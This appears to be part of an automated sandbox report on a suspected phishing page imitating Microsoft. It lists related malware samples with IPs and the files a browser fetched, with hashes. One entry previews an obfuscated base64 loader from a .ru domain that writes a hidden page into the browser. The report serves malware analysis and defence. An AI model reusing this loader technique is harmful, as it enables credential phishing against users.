                                                                                                                              phish_alert_sp2_2.0.0.0 lazz.msgGet hashmaliciousUnknownBrowse
                                                                                                                              • 52.109.76.243
                                                                                                                              Ttok18.exeGet hashmaliciousVidarBrowse
                                                                                                                              • 20.233.83.145
                                                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                              • 13.107.246.63
                                                                                                                              17333253674c71ac3d5875ca830e11f4630bf65d3b8b7e2686361e216df980d330c80afb30623.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                              • 52.228.161.161
                                                                                                                              No context
                                                                                                                              No context
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):17174
                                                                                                                              Entropy (8bit):2.9129715116732746
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                              MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                              SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                              SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                              SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                              Malicious:false
                                                                                                                              Reputation:high, very likely benign file
                                                                                                                              URL:https://www.microsoft.com/favicon.ico?v2
                                                                                                                              Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:ASCII text, with very long lines (47992), with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):47992
                                                                                                                              Entropy (8bit):5.605846858683577
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:768:LuxoaUN4+OIhwP53+e0QfA31jQM9OT81NHv4rnwfe:LuxoaU2+LwB2+G1ZdvCwfe
                                                                                                                              MD5:CF3402D7483B127DED4069D651EA4A22
                                                                                                                              SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                                                                                                                              SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                                                                                                                              SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                                                                                                                              Malicious:false
                                                                                                                              Reputation:high, very likely benign file
                                                                                                                              Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:ASCII text, with very long lines (47694)
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):47695
                                                                                                                              Entropy (8bit):5.401531363850578
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:768:IXCtQmIutwVHbzZBF6gmXLSOzQDjdxdOQbk6sgEvk/7b39tobLKZU8nw81KZLGcD:IGJWHbzZBF6xbGfLsVvy33FU8DW
                                                                                                                              MD5:1685878B80EECB073E51C13F17A5E530
                                                                                                                              SHA1:0FFFA666F98F2D8C1156D46D7F9AB90C5B089AF3
                                                                                                                              SHA-256:C61E2E1347B9ACA3D8F0C9725490470651A1F6C02841FF71F90305EA391CA6D2
                                                                                                                              SHA-512:2B32A82A8E7E0A1F6203A04C3E7DDAE6AC3A4438B2309DC04EA112D862839902DD47D2E4A569BCB6F91E359B1F8197F3A179A206A458881A66E89860F96D526E
                                                                                                                              Malicious:false
                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                              Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:ASCII text, with very long lines (47992), with no line terminators
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):47992
                                                                                                                              Entropy (8bit):5.605846858683577
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:768:LuxoaUN4+OIhwP53+e0QfA31jQM9OT81NHv4rnwfe:LuxoaU2+LwB2+G1ZdvCwfe
                                                                                                                              MD5:CF3402D7483B127DED4069D651EA4A22
                                                                                                                              SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                                                                                                                              SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                                                                                                                              SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                                                                                                                              Malicious:false
                                                                                                                              URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
                                                                                                                              Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):15
                                                                                                                              Entropy (8bit):3.189898095464287
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Uh1Kn:UDKn
                                                                                                                              MD5:39A19D0882684989864FA50BCED6A2D1
                                                                                                                              SHA1:5CED55DAC2E0427E9DC605CEC1FEDAB0949EB15E
                                                                                                                              SHA-256:8FBEDED073249C3611742297EE96A976A95EE113F33B9A422A5D3A7A2DEB63E5
                                                                                                                              SHA-512:E795CB7DE27B42948B7DDFF19F3B401A8F95753AC7D37D9B5F52D8DACD2AA43A2AD9EACEC29F77D28080E20C21C48B9FA88A733FAC108939FB2F0EB036C7AEEE
                                                                                                                              Malicious:false
                                                                                                                              URL:https://statics-marketingsites-wcus-ms-com.akamaized.net/statics/override.css?c=7
                                                                                                                              Preview:/* empty css */
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:ASCII text, with very long lines (32089)
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):92629
                                                                                                                              Entropy (8bit):5.303443527492463
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:1536:dnu00HWWaRxkqJg09pYxoxDKMXJrg8hXXO4dK3kyfiLJBhdSZE+I+Qg7rbaN1RUx:ddkWgoBhcZRQgmW42qe
                                                                                                                              MD5:397754BA49E9E0CF4E7C190DA78DDA05
                                                                                                                              SHA1:AE49E56999D82802727455F0BA83B63ACD90A22B
                                                                                                                              SHA-256:C12F6098E641AACA96C60215800F18F5671039AECF812217FAB3C0D152F6ADB4
                                                                                                                              SHA-512:8C64754F77507AB2C24A6FC818419B9DD3F0CECCC9065290E41AFDBEE0743F0DA2CB13B2FBB00AFA525C082F1E697CB3FFD76EF9B902CB81D7C41CA1C641DFFB
                                                                                                                              Malicious:false
                                                                                                                              Preview:/*! jQuery v1.9.1 | (c) 2005, 2012 jQuery Foundation, Inc. | jquery.org/license.//@ sourceMappingURL=jquery.min.map.*/(function(e,t){var n,r,i=typeof t,o=e.document,a=e.location,s=e.jQuery,u=e.$,l={},c=[],p="1.9.1",f=c.concat,d=c.push,h=c.slice,g=c.indexOf,m=l.toString,y=l.hasOwnProperty,v=p.trim,b=function(e,t){return new b.fn.init(e,t,r)},x=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,w=/\S+/g,T=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,N=/^(?:(<[\w\W]+>)[^>]*|#([\w-]*))$/,C=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,k=/^[\],:{}\s]*$/,E=/(?:^|:|,)(?:\s*\[)+/g,S=/\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g,A=/"[^"\\\r\n]*"|true|false|null|-?(?:\d+\.|)\d+(?:[eE][+-]?\d+|)/g,j=/^-ms-/,D=/-([\da-z])/gi,L=function(e,t){return t.toUpperCase()},H=function(e){(o.addEventListener||"load"===e.type||"complete"===o.readyState)&&(q(),b.ready())},q=function(){o.addEventListener?(o.removeEventListener("DOMContentLoaded",H,!1),e.removeEventListener("load",H,!1)):(o.detachEvent("onreadystatechange",H),e.detachEvent("onload",H)
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:PNG image data, 216 x 46, 8-bit/color RGBA, non-interlaced
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):4054
                                                                                                                              Entropy (8bit):7.797012573497454
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:zICvnyRHJ3BRZPcSPQ72N2xoiR4fTJX/rj4sFNMkk5/p1k2lPUmbm39o4aL7V9XH:10nvE724xoiRQJPrjpLKSFl9oX31Z1d
                                                                                                                              MD5:9F14C20150A003D7CE4DE57C298F0FBA
                                                                                                                              SHA1:DAA53CF17CC45878A1B153F3C3BF47DC9669D78F
                                                                                                                              SHA-256:112FEC798B78AA02E102A724B5CB1990C0F909BC1D8B7B1FA256EAB41BBC0960
                                                                                                                              SHA-512:D4F6E49C854E15FE48D6A1F1A03FDA93218AB8FCDB2C443668E7DF478830831ACC2B41DAEFC25ED38FCC8D96C4401377374FED35C36A5017A11E63C8DAE5C487
                                                                                                                              Malicious:false
                                                                                                                              URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
                                                                                                                              Preview:.PNG........IHDR.............J.......tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c132 79.159284, 2016/04/19-13:13:40 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:A00BC639840A11E68CBEB97C2156C7FD" xmpMM:InstanceID="xmp.iid:A00BC638840A11E68CBEB97C2156C7FD" xmp:CreatorTool="Adobe Photoshop CC 2015.5 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A2C931A470A111E6AEDFA14578553B7B" stRef:documentID="xmp.did:A2C931A570A111E6AEDFA14578553B7B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......DIDATx..\..UU.>.7..3....h.L..& j2...h.@..".........`U.......R"..Dq.&.BJR 1.4`$.200...l........wg.y.[k/
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):17174
                                                                                                                              Entropy (8bit):2.9129715116732746
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                              MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                              SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                              SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                              SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                              Malicious:false
                                                                                                                              Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:ASCII text, with very long lines (41651)
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):131537
                                                                                                                              Entropy (8bit):5.2237799798561975
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3072:1f/HuF3CpxEIqQ0/9d1EwgXAnKxnKKviV:1f/HuZ1ILGV
                                                                                                                              MD5:30B7C335C62E5269E2D35B8E8B9F44B4
                                                                                                                              SHA1:C6D92B1516EB8F6D44AAF171FB24A1B2AADD0C4C
                                                                                                                              SHA-256:10733A5D876108F81C5F78EEE5C9760A739D89C52FA6180C4290B7F909F24346
                                                                                                                              SHA-512:5BCE247C84C88F993A857CE2F1E8540C648672DEB6D92A55BC808C33394B784C52866D635BEC8B7CD5E62A7EA4109569AC8BCD1381571B84592ACD6C5901D7A8
                                                                                                                              Malicious:false
                                                                                                                              URL:https://www.microsoft.com/onerfstatics/marketingsites-wcus-prod/shell/_scrf/js/themes=default/54-af9f9f/c0-247156/de-099401/e1-a50eee/e7-954872/d8-97d509/f0-251fe2/46-be1318/77-04a268/11-240c7b/63-077520/a4-34de62/1b-c96630/db-bc0148/dc-7e9864/78-4c7d22/e1-c35781/40-7b7803/cd-23d3b0/6d-1e7ed0/b7-cadaa7/ca-40b7b0/4e-ee3a55/3e-f5c39b/c3-6454d7/f9-7592d3/92-10345d/79-499886/7e-cda2d3/db-f3b1fd/93-283c2d/e0-3c9860/91-97a04f/1f-100dea/33-abe4df/19-c0fae7?ver=2.0&iife=1
                                                                                                                              Preview:(function(){/**. * @license almond 0.3.3 Copyright jQuery Foundation and other contributors.. * Released under MIT license, http://github.com/requirejs/almond/LICENSE. */.var requirejs,require,define,__extends;(function(n){function r(n,t){return w.call(n,t)}function s(n,t){var o,s,f,e,h,p,c,b,r,l,w,k,u=t&&t.split("/"),a=i.map,y=a&&a["*"]||{};if(n){for(n=n.split("/"),h=n.length-1,i.nodeIdCompat&&v.test(n[h])&&(n[h]=n[h].replace(v,"")),n[0].charAt(0)==="."&&u&&(k=u.slice(0,u.length-1),n=k.concat(n)),r=0;r<n.length;r++)if(w=n[r],w===".")n.splice(r,1),r-=1;else if(w==="..")if(r===0||r===1&&n[2]===".."||n[r-1]==="..")continue;else r>0&&(n.splice(r-1,2),r-=2);n=n.join("/")}if((u||y)&&a){for(o=n.split("/"),r=o.length;r>0;r-=1){if(s=o.slice(0,r).join("/"),u)for(l=u.length;l>0;l-=1)if(f=a[u.slice(0,l).join("/")],f&&(f=f[s],f)){e=f;p=r;break}if(e)break;!c&&y&&y[s]&&(c=y[s],b=r)}!e&&c&&(e=c,p=b);e&&(o.splice(0,p,e),n=o.join("/"))}return n}function y(t,i){return function(){var r=b.call(arguments,0
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:PNG image data, 73 x 36, 8-bit/color RGB, non-interlaced
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):61
                                                                                                                              Entropy (8bit):3.9821736799861016
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:yionv//thPlMbtlnTHxl/k4E08up:6v/lhP+B7Tp
                                                                                                                              MD5:D875F3580D84285E8FA76FEE9180F54B
                                                                                                                              SHA1:67E7927F1B26423220B4017A4EDD1F4EEF97D8EA
                                                                                                                              SHA-256:89F19A2311038524FBFDBAEADED150F912D5AB5B764CAF80D775AFFB153FB900
                                                                                                                              SHA-512:B066EF894980E22DEA94DA9232321A4DBD26D1E36D57D2D9CCFE9DF825EA074B7CE8137CAFF06B51347298219211A0A4CA0D1084E1F57175987AEDD063AB0BE8
                                                                                                                              Malicious:false
                                                                                                                              Preview:.PNG........IHDR...I...$.....J{......IDAT.....$.....IEND.B`.
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:PNG image data, 73 x 36, 8-bit/color RGB, non-interlaced
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):61
                                                                                                                              Entropy (8bit):3.9821736799861016
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:yionv//thPlMbtlnTHxl/k4E08up:6v/lhP+B7Tp
                                                                                                                              MD5:D875F3580D84285E8FA76FEE9180F54B
                                                                                                                              SHA1:67E7927F1B26423220B4017A4EDD1F4EEF97D8EA
                                                                                                                              SHA-256:89F19A2311038524FBFDBAEADED150F912D5AB5B764CAF80D775AFFB153FB900
                                                                                                                              SHA-512:B066EF894980E22DEA94DA9232321A4DBD26D1E36D57D2D9CCFE9DF825EA074B7CE8137CAFF06B51347298219211A0A4CA0D1084E1F57175987AEDD063AB0BE8
                                                                                                                              Malicious:false
                                                                                                                              URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8ece78d77fea8c95/1733343368097/Zbvu0NF-cP9MNpr
                                                                                                                              Preview:.PNG........IHDR...I...$.....J{......IDAT.....$.....IEND.B`.
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):61
                                                                                                                              Entropy (8bit):3.990210155325004
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                                              MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                              SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                              SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                              SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                              Malicious:false
                                                                                                                              Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:ASCII text, with very long lines (32089)
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):92629
                                                                                                                              Entropy (8bit):5.303443527492463
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:1536:dnu00HWWaRxkqJg09pYxoxDKMXJrg8hXXO4dK3kyfiLJBhdSZE+I+Qg7rbaN1RUx:ddkWgoBhcZRQgmW42qe
                                                                                                                              MD5:397754BA49E9E0CF4E7C190DA78DDA05
                                                                                                                              SHA1:AE49E56999D82802727455F0BA83B63ACD90A22B
                                                                                                                              SHA-256:C12F6098E641AACA96C60215800F18F5671039AECF812217FAB3C0D152F6ADB4
                                                                                                                              SHA-512:8C64754F77507AB2C24A6FC818419B9DD3F0CECCC9065290E41AFDBEE0743F0DA2CB13B2FBB00AFA525C082F1E697CB3FFD76EF9B902CB81D7C41CA1C641DFFB
                                                                                                                              Malicious:false
                                                                                                                              URL:https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
                                                                                                                              Preview:/*! jQuery v1.9.1 | (c) 2005, 2012 jQuery Foundation, Inc. | jquery.org/license.//@ sourceMappingURL=jquery.min.map.*/(function(e,t){var n,r,i=typeof t,o=e.document,a=e.location,s=e.jQuery,u=e.$,l={},c=[],p="1.9.1",f=c.concat,d=c.push,h=c.slice,g=c.indexOf,m=l.toString,y=l.hasOwnProperty,v=p.trim,b=function(e,t){return new b.fn.init(e,t,r)},x=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,w=/\S+/g,T=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,N=/^(?:(<[\w\W]+>)[^>]*|#([\w-]*))$/,C=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,k=/^[\],:{}\s]*$/,E=/(?:^|:|,)(?:\s*\[)+/g,S=/\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g,A=/"[^"\\\r\n]*"|true|false|null|-?(?:\d+\.|)\d+(?:[eE][+-]?\d+|)/g,j=/^-ms-/,D=/-([\da-z])/gi,L=function(e,t){return t.toUpperCase()},H=function(e){(o.addEventListener||"load"===e.type||"complete"===o.readyState)&&(q(),b.ready())},q=function(){o.addEventListener?(o.removeEventListener("DOMContentLoaded",H,!1),e.removeEventListener("load",H,!1)):(o.detachEvent("onreadystatechange",H),e.detachEvent("onload",H)
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:HTML document, ASCII text, with very long lines (7341), with CRLF line terminators
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):19577
                                                                                                                              Entropy (8bit):5.880135288102186
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:WHnuG3l5ZiXf18DVvdyXA3aYSlWf/fbfcnuG3l5ZiXf18DVvdyXA3aYSlWf/fbfH:el5ZicFyQ3R4Rl5ZicFyQ3R44lrAlro
                                                                                                                              MD5:E510074E30D6B7C0A8D0BE82C6F23914
                                                                                                                              SHA1:4C1AD8AFE4E148A2616035E67347A9B5DED90CF9
                                                                                                                              SHA-256:BB6F9A3CFC1D93CBBE8778D0DFDB3FBFED2635580C2B16091BF2180806106071
                                                                                                                              SHA-512:2B793877D32648998CA55FE4DA556DE251E048E15E09363DAD4112DEB50967052D14290E6CF2FA61D378A49EBA4EEC811EED347A960673704DC2912FE6DF8133
                                                                                                                              Malicious:false
                                                                                                                              URL:https://h6n.xswpbsmx.ru/9dCP/
                                                                                                                              Preview: Don&#039;t watch the clock; do what it does. Keep going. -->....<script>....if(atob("aHR0cHM6Ly9NWUIueHN3cGJzbXgucnUvOWRDUC8=") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0KYm9keSB7DQogIGJhY2tncm91bmQtY29sb3I6ICNmZmY7DQogIGhlaWdodDogMTAw
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65532), with no line terminators
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):563851
                                                                                                                              Entropy (8bit):5.221453271093944
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6144:2VR57iqbPXlB5UR5vWenR5xWeMFdBjL+ks0EcU0MWEsuWe5fXbHfxlN/FNCn/Lpl:tTP0BKYtf
                                                                                                                              MD5:12DD1E4D0485A80184B36D158018DE81
                                                                                                                              SHA1:EB2594062E90E3DCD5127679F9C369D3BF39D61C
                                                                                                                              SHA-256:A04B5B8B345E79987621008E6CC9BEF2B684663F9A820A0C7460E727A2A4DDC3
                                                                                                                              SHA-512:F3A92BF0C681E6D2198970F43B966ABDF8CCBFF3F9BD5136A1CA911747369C49F8C36C69A7E98E0F2AED3163D9D1C5D44EFCE67A178DE479196845721219E12C
                                                                                                                              Malicious:false
                                                                                                                              URL:https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.25.0/css/mwf-west-european-default.min.css
                                                                                                                              Preview:@charset "UTF-8";/*! @ms-mwf/mwf - v1.25.0+6321934 | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*//*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css *
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:Web Open Font Format, TrueType, length 26288, version 0.0
